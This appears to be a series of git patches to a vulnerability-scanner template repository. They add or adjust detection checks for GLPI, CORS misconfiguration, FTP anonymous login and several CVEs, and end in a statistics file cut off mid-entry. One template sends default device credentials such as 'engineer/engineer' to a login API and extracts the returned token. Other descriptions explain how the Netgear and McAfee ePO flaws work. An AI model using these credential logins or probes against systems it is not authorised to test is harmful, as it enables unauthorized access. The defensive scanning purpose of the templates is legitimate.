a/misconfiguration/java-melody-exposed.yaml b/misconfiguration/java-melody-exposed.yaml index 0139f7ec02..a2e2f0686d 100644 --- a/misconfiguration/java-melody-exposed.yaml +++ b/misconfiguration/java-melody-exposed.yaml @@ -4,7 +4,7 @@ info: name: JavaMelody Monitoring Exposed author: dhiyaneshDK,thomas_from_offensity severity: medium - description: JavaMelody is a tool used to monitor Java or Java EE applications in QA and production environments. JavaMelody was detected on this web application. One option in the dashboard is to “View http sessions”. This can be used by an attacker to steal a user’s session. + description: JavaMelody is a tool used to monitor Java or Java EE applications in QA and production environments. JavaMelody was detected on this web application. One option in the dashboard is to "View http sessions". This can be used by an attacker to steal a user’s session. reference: | - https://www.acunetix.com/vulnerabilities/web/javamelody-publicly-accessible/ - https://github.com/javamelody/javamelody/wiki/UserGuide#16-security diff --git a/vulnerabilities/other/mcafee-epo-rce.yaml b/vulnerabilities/other/mcafee-epo-rce.yaml index 8524264b95..8d8f248d89 100644 --- a/vulnerabilities/other/mcafee-epo-rce.yaml +++ b/vulnerabilities/other/mcafee-epo-rce.yaml @@ -8,7 +8,7 @@ info: A ZipSlip vulnerability in McAfee ePolicy Orchestrator (ePO) is a type of Path Traversal occurring when archives are unpacked if the names of the packed files are not properly sanitized. - An attacker can create archives with files containing “../” in their names, + An attacker can create archives with files containing "../" in their names, making it possible to upload arbitrary files to arbitrary directories or overwrite existing ones during archive extraction. diff --git a/vulnerabilities/other/netgear-router-auth-bypass.yaml b/vulnerabilities/other/netgear-router-auth-bypass.yaml index f2d94ceba8..c558f9bfde 100644 --- a/vulnerabilities/other/netgear-router-auth-bypass.yaml +++ b/vulnerabilities/other/netgear-router-auth-bypass.yaml @@ -4,7 +4,7 @@ info: name: Netgear DGN2200v1 Router Authentication Bypass author: gy741 severity: high - description: NETGEAR decided to use to check if a page has “.jpg”, “.gif” or “ess_” substrings, trying to match the entire URL. We can therefore access any page on the device, including those that require authentication, by appending a GET variable with the relevant substring (like “?.gif”). + description: NETGEAR decided to use to check if a page has ".jpg", ".gif" or "ess_" substrings, trying to match the entire URL. We can therefore access any page on the device, including those that require authentication, by appending a GET variable with the relevant substring (like "?.gif"). reference: | - https://www.microsoft.com/security/blog/2021/06/30/microsoft-finds-new-netgear-firmware-vulnerabilities-that-could-lead-to-identity-theft-and-full-system-compromise/ - https://kb.netgear.com/000062646/Security-Advisory-for-Multiple-HTTPd-Authentication-Vulnerabilities-on-DGN2200v1 From 5ae8bf50889c0a39900fe66312cde19317810441 Mon Sep 17 00:00:00 2001 From: socketz Date: Wed, 25 Aug 2021 14:32:17 +0200 Subject: [PATCH 1867/4083] Added CS141 SNMP template to default-logins --- default-logins/abb/cs141-default-login.yaml | 64 +++++++++++++++++++++ 1 file changed, 64 insertions(+) create mode 100644 default-logins/abb/cs141-default-login.yaml diff --git a/default-logins/abb/cs141-default-login.yaml b/default-logins/abb/cs141-default-login.yaml new file mode 100644 index 0000000000..25b6b8a36e --- /dev/null +++ b/default-logins/abb/cs141-default-login.yaml @@ -0,0 +1,64 @@ +id: cs141-default-login + +info: + name: CS141 SNMP Module Default Credentials + author: socketz + severity: medium + reference: https://www.generex.de/media/pages/packages/documents/manuals/f65348d5b6-1628841637/manual_CS141_en.pdf + tags: hiawatha,iot,default-login + +requests: + - raw: + - | + POST /api/login HTTP/1.1 + Host: {{Hostname}} + Content-Length: 44 + Accept: application/json, text/plain, */* + Content-Type: application/json + Accept-Encoding: gzip, deflate + Accept-Language: en,es-ES;q=0.9,es;q=0.8 + Connection: close + + {"userName":"admin","password":"cs141-snmp"} + + - | + POST /api/login HTTP/1.1 + Host: {{Hostname}} + Content-Length: 44 + Accept: application/json, text/plain, */* + Content-Type: application/json + Accept-Encoding: gzip, deflate + Accept-Language: en,es-ES;q=0.9,es;q=0.8 + Connection: close + + {"userName":"engineer","password":"engineer"} + + - | + POST /api/login HTTP/1.1 + Host: {{Hostname}} + Content-Length: 44 + Accept: application/json, text/plain, */* + Content-Type: application/json + Accept-Encoding: gzip, deflate + Accept-Language: en,es-ES;q=0.9,es;q=0.8 + Connection: close + + {"userName":"guest","password":"guest"} + + matchers-condition: and + matchers: + - type: word + words: + - 'accessToken' + - 'application/json' + condition: and + part: header + + - type: status + status: + - 200 + + extractors: + - type: kval + kval: + - accessToken From 35570987e0eb68170e1e129bfc6d0dd11dd99326 Mon Sep 17 00:00:00 2001 From: socketz Date: Wed, 25 Aug 2021 14:47:28 +0200 Subject: [PATCH 1868/4083] Removed useless template --- .../http-present-security-headers.yaml | 116 ------------------ 1 file changed, 116 deletions(-) delete mode 100644 miscellaneous/http-present-security-headers.yaml diff --git a/miscellaneous/http-present-security-headers.yaml b/miscellaneous/http-present-security-headers.yaml deleted file mode 100644 index 66b98f6ea2..0000000000 --- a/miscellaneous/http-present-security-headers.yaml +++ /dev/null @@ -1,116 +0,0 @@ -id: http-present-security-headers - -info: - name: HTTP Present Security Headers - author: socketz - severity: info - description: It searches present security headers, but obviously, could be so less generic and could be useless for Bug Bounty. - tags: config,headers - -requests: - - method: GET - path: - - "{{BaseURL}}" - redirects: true - max-redirects: 3 - extractors: - - type: regex - part: header - group: 0 - regex: - - "(?im)(Strict-Transport-Security):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(X-Frame-Options):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(X-Content-Type-Options):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(Content-Security-Policy):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(X-Permitted-Cross-Domain-Policies):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(Referrer-Policy):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(Clear-Site-Data):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(Cross-Origin-Embedder-Policy):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(Cross-Origin-Opener-Policy):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(Cross-Origin-Resource-Policy):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(X-XSS-Protection):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(Public-Key-Pins):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(Except-CT):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(Feature-Policy):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(Permissions-Policy):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(Document-Policy):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(X-XSRF-TOKEN):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(X-CSRF-TOKEN):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(X-CSRFToken):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(Authorization):(.*)" From 05305904ef3163656819e45e9216584423670759 Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 26 Aug 2021 02:43:53 +0530 Subject: [PATCH 1869/4083] more strict matchers --- cves/2021/CVE-2021-38751.yaml | 15 +++++++++------ network/ftp-default-credentials.yaml | 8 +++++--- .../wordpress/wordpress-woocommerce-sqli.yaml | 2 ++ 3 files changed, 16 insertions(+), 9 deletions(-) diff --git a/cves/2021/CVE-2021-38751.yaml b/cves/2021/CVE-2021-38751.yaml index 8d5172063c..4d8857e9fa 100644 --- a/cves/2021/CVE-2021-38751.yaml +++ b/cves/2021/CVE-2021-38751.yaml @@ -17,18 +17,21 @@ info: requests: - method: GET path: - - "{{BaseURL}}/" - - "{{BaseURL}}/login/showlogin" + - "{{BaseURL}}" + headers: Host: "{{randstr}}.tld" matchers-condition: and matchers: - - type: regex - regex: - - (EXPONENT\.(?:(?:J(?:QUERY|S)_UR|URL_FUL)|YUI2_UR)L=")?https?://{{randstr}}\.tld + - type: word + words: + - '{{randstr}}.tld' + - 'EXPONENT.PATH' + - 'EXPONENT.URL' part: body + condition: and - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/network/ftp-default-credentials.yaml b/network/ftp-default-credentials.yaml index f8ef8e5479..d49482dad6 100644 --- a/network/ftp-default-credentials.yaml +++ b/network/ftp-default-credentials.yaml @@ -1,9 +1,9 @@ id: ftp-default-credentials info: - name: FTP Service with default credentials + name: FTP Service with anonymous Login author: pussycat0x - severity: low + severity: info tags: network,ftp,default-login network: @@ -17,4 +17,6 @@ network: matchers: - type: word words: - - "230" \ No newline at end of file + - "230" + - "Anonymous user logged in" + condition: and \ No newline at end of file diff --git a/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml b/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml index 6b2f2e9a82..ac2b1073b6 100644 --- a/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml +++ b/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml @@ -21,6 +21,8 @@ requests: words: - 'sqli-test' - 'attribute_counts' + - 'price_range' + - 'term' condition: and - type: word From 22d0b35775d54d51c6cf8f4c85cc1c7e2311a2b6 Mon Sep 17 00:00:00 2001 From: Douglas Santos Date: Wed, 25 Aug 2021 21:55:22 +0000 Subject: [PATCH 1870/4083] GLPI detection, status and telemetry exposure --- .../glpi-status-ldap-domain-disclosure.yaml | 31 +++++++++++++++++++ .../files/glpi-telemetry-disclosure.yaml | 23 ++++++++++++++ technologies/glpi-cms-detect.yaml | 25 +++++++++++++++ 3 files changed, 79 insertions(+) create mode 100644 exposures/files/glpi-status-ldap-domain-disclosure.yaml create mode 100644 exposures/files/glpi-telemetry-disclosure.yaml create mode 100644 technologies/glpi-cms-detect.yaml diff --git a/exposures/files/glpi-status-ldap-domain-disclosure.yaml b/exposures/files/glpi-status-ldap-domain-disclosure.yaml new file mode 100644 index 0000000000..8260b0c0d3 --- /dev/null +++ b/exposures/files/glpi-status-ldap-domain-disclosure.yaml @@ -0,0 +1,31 @@ +id: glpi-status-domain-disclosure + +info: + name: GLPI Status Domain Disclosure + author: dogasantos + severity: info + tags: glpi,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/status.php" + - "{{BaseURL}}/glpi/status.php" + - "{{BaseURL}}/glpi2/status.php" + + matchers-condition: and + matchers: + - type: word + words: + - "GLPI_DB_OK" + - "Check LDAP servers" + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - '((\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})|([a-zA-Z0-9]+(\.[a-zA-Z0-9]{2,3}){1,2}))' diff --git a/exposures/files/glpi-telemetry-disclosure.yaml b/exposures/files/glpi-telemetry-disclosure.yaml new file mode 100644 index 0000000000..034530b18b --- /dev/null +++ b/exposures/files/glpi-telemetry-disclosure.yaml @@ -0,0 +1,23 @@ +id: glpi-telemetry-disclosure + +info: + name: GLPI Telemetry Disclosure + author: dogasantos + severity: info + tags: glpi,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/ajax/telemetry.php" + - "{{BaseURL}}/glpi/ajax/telemetry.php" + matchers-condition: and + matchers: + - type: word + words: + - "uuid" + - "glpi" + condition: and + - type: status + status: + - 200 diff --git a/technologies/glpi-cms-detect.yaml b/technologies/glpi-cms-detect.yaml new file mode 100644 index 0000000000..fbd9fddfe4 --- /dev/null +++ b/technologies/glpi-cms-detect.yaml @@ -0,0 +1,25 @@ +id: glpi-cms-detect + +info: + name: GLPI Cms Detection + author: dogasantos + severity: info + tags: glpi,cms,php + +requests: + - method: GET + path: + - "{{BaseURL}}/" + - "{{BaseURL}}/glpi/" + - "{{BaseURL}}/glpi2/" + matchers-condition: and + matchers: + - type: word + words: + - "CFG_GLPI" + - "_glpi_csrf_token" + - "GLPI Copyright" + condition: and + - type: status + status: + - 200 From 064ee029220c32dc5b5a140c3e7e13243d4fb933 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Thu, 26 Aug 2021 03:39:38 +0530 Subject: [PATCH 1871/4083] Update glpi-cms-detect.yaml --- technologies/glpi-cms-detect.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/technologies/glpi-cms-detect.yaml b/technologies/glpi-cms-detect.yaml index fbd9fddfe4..422e350661 100644 --- a/technologies/glpi-cms-detect.yaml +++ b/technologies/glpi-cms-detect.yaml @@ -9,9 +9,10 @@ info: requests: - method: GET path: - - "{{BaseURL}}/" + - "{{BaseURL}}" - "{{BaseURL}}/glpi/" - "{{BaseURL}}/glpi2/" + matchers-condition: and matchers: - type: word @@ -20,6 +21,7 @@ requests: - "_glpi_csrf_token" - "GLPI Copyright" condition: and + - type: status status: - 200 From ce1daa8c80b041101076bdaf593e6334c776eec2 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Thu, 26 Aug 2021 03:42:53 +0530 Subject: [PATCH 1872/4083] Update glpi-status-ldap-domain-disclosure.yaml --- exposures/files/glpi-status-ldap-domain-disclosure.yaml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/exposures/files/glpi-status-ldap-domain-disclosure.yaml b/exposures/files/glpi-status-ldap-domain-disclosure.yaml index 8260b0c0d3..9704214ef3 100644 --- a/exposures/files/glpi-status-ldap-domain-disclosure.yaml +++ b/exposures/files/glpi-status-ldap-domain-disclosure.yaml @@ -17,8 +17,10 @@ requests: matchers: - type: word words: - - "GLPI_DB_OK" - - "Check LDAP servers" + - "GLPI_" + - "LDAP servers" + condition: and + - type: status status: - 200 From 0d3d9a37d9680813d23d2cd2358c2f106d2dddb9 Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 26 Aug 2021 03:47:32 +0530 Subject: [PATCH 1873/4083] misc update --- exposures/files/glpi-status-ldap-domain-disclosure.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposures/files/glpi-status-ldap-domain-disclosure.yaml b/exposures/files/glpi-status-ldap-domain-disclosure.yaml index 9704214ef3..9c912eac72 100644 --- a/exposures/files/glpi-status-ldap-domain-disclosure.yaml +++ b/exposures/files/glpi-status-ldap-domain-disclosure.yaml @@ -18,7 +18,7 @@ requests: - type: word words: - "GLPI_" - - "LDAP servers" + - "LDAP server" condition: and - type: status From ee49f89109eae79a814b41c2231cc9f2cc063bb3 Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 26 Aug 2021 03:51:35 +0530 Subject: [PATCH 1874/4083] misc update --- exposures/files/glpi-telemetry-disclosure.yaml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/exposures/files/glpi-telemetry-disclosure.yaml b/exposures/files/glpi-telemetry-disclosure.yaml index 034530b18b..12428ecaf3 100644 --- a/exposures/files/glpi-telemetry-disclosure.yaml +++ b/exposures/files/glpi-telemetry-disclosure.yaml @@ -11,13 +11,15 @@ requests: path: - "{{BaseURL}}/ajax/telemetry.php" - "{{BaseURL}}/glpi/ajax/telemetry.php" + matchers-condition: and matchers: - type: word words: - - "uuid" - - "glpi" + - '"uuid":' + - '"glpi":' condition: and + - type: status status: - 200 From 1999a9b560fbf4331e04da6d9da4b288de5aa0ac Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 26 Aug 2021 04:24:06 +0530 Subject: [PATCH 1875/4083] Enhanced CORS checks --- vulnerabilities/generic/basic-cors.yaml | 29 --------- vulnerabilities/generic/cors-misconfig.yaml | 66 +++++++++++++++++++++ 2 files changed, 66 insertions(+), 29 deletions(-) delete mode 100644 vulnerabilities/generic/basic-cors.yaml create mode 100644 vulnerabilities/generic/cors-misconfig.yaml diff --git a/vulnerabilities/generic/basic-cors.yaml b/vulnerabilities/generic/basic-cors.yaml deleted file mode 100644 index 0861b5ff8b..0000000000 --- a/vulnerabilities/generic/basic-cors.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: basic-cors-misconfig - -info: - name: Basic CORS misconfiguration - author: nadino,G4L1T0,convisoappsec - severity: info - reference: https://portswigger.net/web-security/cors - tags: cors,generic - -requests: - - method: GET - path: - - "{{BaseURL}}" - headers: - Origin: https://evil.com - - matchers-condition: or - matchers: - - type: word - words: - - "Access-Control-Allow-Origin: https://evil.com" - - "Access-Control-Allow-Credentials: true" - condition: and - part: header - - - type: word - part: header - words: - - "Access-Control-Allow-Origin: *" diff --git a/vulnerabilities/generic/cors-misconfig.yaml b/vulnerabilities/generic/cors-misconfig.yaml new file mode 100644 index 0000000000..8e814fade3 --- /dev/null +++ b/vulnerabilities/generic/cors-misconfig.yaml @@ -0,0 +1,66 @@ +id: cors-misconfig + +info: + name: Basic CORS misconfiguration + author: nadino,G4L1T0,convisoappsec,pdteam + severity: info + reference: https://portswigger.net/web-security/cors + tags: cors,generic + +requests: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + - | + GET / HTTP/1.1 + Host: {{Hostname}} + Origin: {{randstr}}.com + + - | + GET / HTTP/1.1 + Host: {{Hostname}} + Origin: null + +# - | +# GET / HTTP/1.1 +# Host: {{Hostname}} +# Origin: {{randstr}}.{{Hostname}} +# +# - | +# GET / HTTP/1.1 +# Host: {{Hostname}} +# Origin: {{Hostname}}{{randstr}} + +# TO DO for future as currently {{Hostname}} is not supported in matchers + + matchers-condition: or + matchers: + - type: dsl + name: arbitrary-origin + dsl: + - "contains(tolower(all_headers), 'access-control-allow-origin: {{randstr}}.com')" + - "contains(tolower(all_headers), 'access-control-allow-credentials: true')" + condition: and + + - type: dsl + name: null-origin + dsl: + - "contains(tolower(all_headers), 'access-control-allow-origin: null')" + - "contains(tolower(all_headers), 'access-control-allow-credentials: true')" + condition: and + + - type: dsl + name: wildcard-acac + dsl: + - "contains(tolower(all_headers), 'access-control-allow-origin: *')" + - "contains(tolower(all_headers), 'access-control-allow-credentials: true')" + condition: and + + - type: dsl + name: wildcard-no-acac + dsl: + - "contains(tolower(all_headers), 'access-control-allow-origin: *')" + - "!contains(tolower(all_headers), 'access-control-allow-credentials: true')" + condition: and From d3d67ea9b7ee62b4fbd2d757dfe36ee2543635ac Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 25 Aug 2021 23:10:45 +0000 Subject: [PATCH 1876/4083] Auto Generated Templates Stats [Wed Aug 25 23:10:45 UTC 2021] :robot: --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 1416 +++++++++++++++++++++--------------------- TOP-10.md | 18 +- 3 files changed, 720 insertions(+), 716 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index d448d2c607..2770ad553e 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":624},{"name":"panel","count":222},{"name":"xss","count":221},{"name":"exposure","count":212},{"name":"lfi","count":203},{"name":"wordpress","count":203},{"name":"rce","count":189},{"name":"cve2020","count":157},{"name":"wp-plugin","count":136},{"name":"tech","count":103},{"name":"cve2021","count":103},{"name":"config","count":93},{"name":"cve2019","count":88},{"name":"cve2018","count":78},{"name":"takeover","count":74},{"name":"","count":65},{"name":"apache","count":64},{"name":"token","count":64},{"name":"default-login","count":57},{"name":"iot","count":54},{"name":"cve2017","count":48},{"name":"file","count":46},{"name":"oob","count":45},{"name":"unauth","count":42},{"name":"network","count":38},{"name":"joomla","count":36},{"name":"sqli","count":36},{"name":"ssrf","count":32},{"name":"cve2016","count":32},{"name":"workflow","count":30},{"name":"oracle","count":30},{"name":"logs","count":30},{"name":"cve2010","count":28},{"name":"atlassian","count":27},{"name":"misc","count":27},{"name":"jira","count":27},{"name":"redirect","count":25},{"name":"listing","count":25},{"name":"generic","count":22},{"name":"aem","count":19},{"name":"cisco","count":19},{"name":"disclosure","count":18},{"name":"cve2015","count":18},{"name":"sap","count":18},{"name":"router","count":17},{"name":"auth-bypass","count":16},{"name":"springboot","count":16},{"name":"cve2014","count":15},{"name":"cve2012","count":14},{"name":"debug","count":14},{"name":"misconfig","count":13},{"name":"android","count":13},{"name":"struts","count":13},{"name":"fuzz","count":13},{"name":"cve2011","count":13},{"name":"weblogic","count":12},{"name":"dns","count":12},{"name":"dlink","count":12},{"name":"adobe","count":12},{"name":"jenkins","count":12},{"name":"devops","count":11},{"name":"php","count":11},{"name":"cve2013","count":11},{"name":"zoho","count":11},{"name":"magento","count":9},{"name":"xxe","count":9},{"name":"ftp","count":9},{"name":"ruijie","count":8},{"name":"login","count":8},{"name":"aws","count":8},{"name":"rails","count":8},{"name":"airflow","count":8},{"name":"cnvd","count":8},{"name":"scada","count":8},{"name":"gitlab","count":8},{"name":"cve2009","count":7},{"name":"backup","count":7},{"name":"nginx","count":7},{"name":"vmware","count":7},{"name":"cms","count":6},{"name":"google","count":6},{"name":"jetty","count":6},{"name":"api","count":6},{"name":"dell","count":6},{"name":"citrix","count":6},{"name":"files","count":6},{"name":"laravel","count":6},{"name":"netgear","count":6},{"name":"rconfig","count":6},{"name":"cve2008","count":6},{"name":"django","count":6},{"name":"solr","count":6},{"name":"coldfusion","count":6},{"name":"drupal","count":5},{"name":"phpmyadmin","count":5},{"name":"iis","count":5},{"name":"circarlife","count":5},{"name":"headless","count":5},{"name":"microsoft","count":5},{"name":"windows","count":5},{"name":"confluence","count":5},{"name":"docker","count":5},{"name":"lucee","count":5},{"name":"fileupload","count":5},{"name":"wp-theme","count":5},{"name":"ssti","count":5},{"name":"java","count":5},{"name":"ibm","count":5},{"name":"dedecms","count":5},{"name":"firmware","count":4},{"name":"webserver","count":4},{"name":"grafana","count":4},{"name":"thinkphp","count":4},{"name":"traversal","count":4},{"name":"jolokia","count":4},{"name":"crlf","count":4},{"name":"vpn","count":4},{"name":"deserialization","count":4},{"name":"hp","count":4},{"name":"moodle","count":4},{"name":"magmi","count":4},{"name":"asp","count":4},{"name":"tomcat","count":4},{"name":"solarwinds","count":4},{"name":"elastic","count":4},{"name":"zimbra","count":4},{"name":"thinkcmf","count":4},{"name":"artifactory","count":4},{"name":"hongdian","count":4},{"name":"samsung","count":4},{"name":"nodejs","count":4},{"name":"exchange","count":4},{"name":"buffalo","count":4},{"name":"itop","count":3},{"name":"mongodb","count":3},{"name":"nacos","count":3},{"name":"kevinlab","count":3},{"name":"log","count":3},{"name":"slack","count":3},{"name":"bypass","count":3},{"name":"printer","count":3},{"name":"intrusive","count":3},{"name":"httpd","count":3},{"name":"oa","count":3},{"name":"nexus","count":3},{"name":"zhiyuan","count":3},{"name":"backups","count":3},{"name":"terramaster","count":3},{"name":"lfr","count":3},{"name":"resin","count":3},{"name":"targa","count":3},{"name":"ebs","count":3},{"name":"kafka","count":3},{"name":"microstrategy","count":3},{"name":"ofbiz","count":3},{"name":"opensis","count":3},{"name":"r-seenet","count":3},{"name":"ssh","count":3},{"name":"bitrix","count":3},{"name":"openssh","count":3},{"name":"springcloud","count":3},{"name":"fpd","count":3},{"name":"wso2","count":3},{"name":"amazon","count":3},{"name":"symfony","count":3},{"name":"kubernetes","count":3},{"name":"zabbix","count":3},{"name":"fanruan","count":3},{"name":"git","count":3},{"name":"tikiwiki","count":3},{"name":"nosqli","count":3},{"name":"vbulletin","count":3},{"name":"caucho","count":3},{"name":"sharepoint","count":2},{"name":"strapi","count":2},{"name":"chiyu","count":2},{"name":"kibana","count":2},{"name":"netis","count":2},{"name":"vrealize","count":2},{"name":"mida","count":2},{"name":"sonarqube","count":2},{"name":"mail","count":2},{"name":"idrac","count":2},{"name":"shellshock","count":2},{"name":"trixbox","count":2},{"name":"mcafee","count":2},{"name":"telerik","count":2},{"name":"jellyfin","count":2},{"name":"prometheus","count":2},{"name":"smb","count":2},{"name":"avantfax","count":2},{"name":"rockethchat","count":2},{"name":"bigip","count":2},{"name":"yapi","count":2},{"name":"oauth","count":2},{"name":"proxy","count":2},{"name":"jsf","count":2},{"name":"natshell","count":2},{"name":"firebase","count":2},{"name":"status","count":2},{"name":"plesk","count":2},{"name":"huawei","count":2},{"name":"maian","count":2},{"name":"nagios","count":2},{"name":"rockmongo","count":2},{"name":"kentico","count":2},{"name":"icewarp","count":2},{"name":"jeedom","count":2},{"name":"leak","count":2},{"name":"keycloak","count":2},{"name":"linkerd","count":2},{"name":"hasura","count":2},{"name":"openam","count":2},{"name":"guacamole","count":2},{"name":"hjtcloud","count":2},{"name":"odoo","count":2},{"name":"igs","count":2},{"name":"service","count":2},{"name":"smtp","count":2},{"name":"fortios","count":2},{"name":"openfire","count":2},{"name":"chamilo","count":2},{"name":"pega","count":2},{"name":"ucmdb","count":2},{"name":"cve2005","count":2},{"name":"voipmonitor","count":2},{"name":"hpe","count":2},{"name":"hashicorp","count":2},{"name":"rstudio","count":2},{"name":"azure","count":2},{"name":"ecology","count":2},{"name":"grav","count":2},{"name":"cache","count":2},{"name":"showdoc","count":2},{"name":"injection","count":2},{"name":"emerge","count":2},{"name":"cve2007","count":2},{"name":"frp","count":2},{"name":"nextjs","count":2},{"name":"webcam","count":2},{"name":"activemq","count":2},{"name":"glassfish","count":2},{"name":"akkadian","count":2},{"name":"github","count":2},{"name":"saltstack","count":2},{"name":"waf","count":2},{"name":"spark","count":2},{"name":"geowebserver","count":2},{"name":"jboss","count":2},{"name":"dos","count":2},{"name":"wordfence","count":2},{"name":"xxljob","count":2},{"name":"splunk","count":2},{"name":"couchdb","count":2},{"name":"dolibarr","count":2},{"name":"seeyon","count":2},{"name":"paloalto","count":2},{"name":"backdoor","count":2},{"name":"akamai","count":2},{"name":"globalprotect","count":2},{"name":"flir","count":2},{"name":"sonicwall","count":2},{"name":"phpcollab","count":2},{"name":"horde","count":2},{"name":"csrf","count":1},{"name":"sco","count":1},{"name":"redhat","count":1},{"name":"ambari","count":1},{"name":"geutebruck","count":1},{"name":"sgp","count":1},{"name":"xvr","count":1},{"name":"gespage","count":1},{"name":"bullwark","count":1},{"name":"sophos","count":1},{"name":"memcached","count":1},{"name":"ilo","count":1},{"name":"smi","count":1},{"name":"hadoop","count":1},{"name":"ns","count":1},{"name":"xiuno","count":1},{"name":"dotnetnuke","count":1},{"name":"opensmtpd","count":1},{"name":"exponentcms","count":1},{"name":"exposures","count":1},{"name":"kerbynet","count":1},{"name":"spip","count":1},{"name":"ruby","count":1},{"name":"tenda","count":1},{"name":"mantisbt","count":1},{"name":"nuxeo","count":1},{"name":"clave","count":1},{"name":"varnish","count":1},{"name":"ewebs","count":1},{"name":"cofax","count":1},{"name":"grails","count":1},{"name":"visionhub","count":1},{"name":"logontracer","count":1},{"name":"monitorix","count":1},{"name":"biometrics","count":1},{"name":"klog","count":1},{"name":"twitter-server","count":1},{"name":"xunchi","count":1},{"name":"openx","count":1},{"name":"ssl","count":1},{"name":"expose","count":1},{"name":"viewlinc","count":1},{"name":"realteo","count":1},{"name":"labtech","count":1},{"name":"camera","count":1},{"name":"nomad","count":1},{"name":"2014","count":1},{"name":"dnssec","count":1},{"name":"magicflow","count":1},{"name":"panabit","count":1},{"name":"zmanda","count":1},{"name":"totaljs","count":1},{"name":"traefik","count":1},{"name":"cherokee","count":1},{"name":"subrion","count":1},{"name":"mailchimp","count":1},{"name":"acme","count":1},{"name":"aruba","count":1},{"name":"manageengine","count":1},{"name":"cocoon","count":1},{"name":"embedthis","count":1},{"name":"portainer","count":1},{"name":"timeclock","count":1},{"name":"axis","count":1},{"name":"majordomo2","count":1},{"name":"pgadmin","count":1},{"name":"k8","count":1},{"name":"turbocrm","count":1},{"name":"livezilla","count":1},{"name":"fuelcms","count":1},{"name":"nuuo","count":1},{"name":"landrayoa","count":1},{"name":"krweb","count":1},{"name":"liferay","count":1},{"name":"esmtp","count":1},{"name":"szhe","count":1},{"name":"timesheet","count":1},{"name":"jenkin","count":1},{"name":"pippoint","count":1},{"name":"spectracom","count":1},{"name":"uwsgi","count":1},{"name":"goahead","count":1},{"name":"bigbluebutton","count":1},{"name":"dotclear","count":1},{"name":"dotnet","count":1},{"name":"cloudinary","count":1},{"name":"nedi","count":1},{"name":"bruteforce","count":1},{"name":"mantis","count":1},{"name":"tjws","count":1},{"name":"clockwatch","count":1},{"name":"zyxel","count":1},{"name":"wazuh","count":1},{"name":"sage","count":1},{"name":"jnoj","count":1},{"name":"zarafa","count":1},{"name":"glpi","count":1},{"name":"saltapi","count":1},{"name":"vsphere","count":1},{"name":"cerebro","count":1},{"name":"postmessage","count":1},{"name":"plastic","count":1},{"name":"finereport","count":1},{"name":"rfi","count":1},{"name":"chevereto","count":1},{"name":"clusterengine","count":1},{"name":"moinmoin","count":1},{"name":"erp-nc","count":1},{"name":"jquery","count":1},{"name":"netsweeper","count":1},{"name":"sidekiq","count":1},{"name":"extractor","count":1},{"name":"sarg","count":1},{"name":"redis","count":1},{"name":"geddy","count":1},{"name":"announcekit","count":1},{"name":"xdcms","count":1},{"name":"crm","count":1},{"name":"svn","count":1},{"name":"sangfor","count":1},{"name":"mara","count":1},{"name":"avalanche","count":1},{"name":"lotuscms","count":1},{"name":"vsftpd","count":1},{"name":"blackboard","count":1},{"name":"kyan","count":1},{"name":"fedora","count":1},{"name":"iptime","count":1},{"name":"dvwa","count":1},{"name":"blind","count":1},{"name":"gogs","count":1},{"name":"getsimple","count":1},{"name":"doh","count":1},{"name":"email","count":1},{"name":"cve2006","count":1},{"name":"cse","count":1},{"name":"primetek","count":1},{"name":"camunda","count":1},{"name":"ecom","count":1},{"name":"influxdb","count":1},{"name":"hiboss","count":1},{"name":"exacqvision","count":1},{"name":"harbor","count":1},{"name":"razor","count":1},{"name":"aura","count":1},{"name":"optiLink","count":1},{"name":"bookstack","count":1},{"name":"floc","count":1},{"name":"nordex","count":1},{"name":"jitsi","count":1},{"name":"cloudflare","count":1},{"name":" 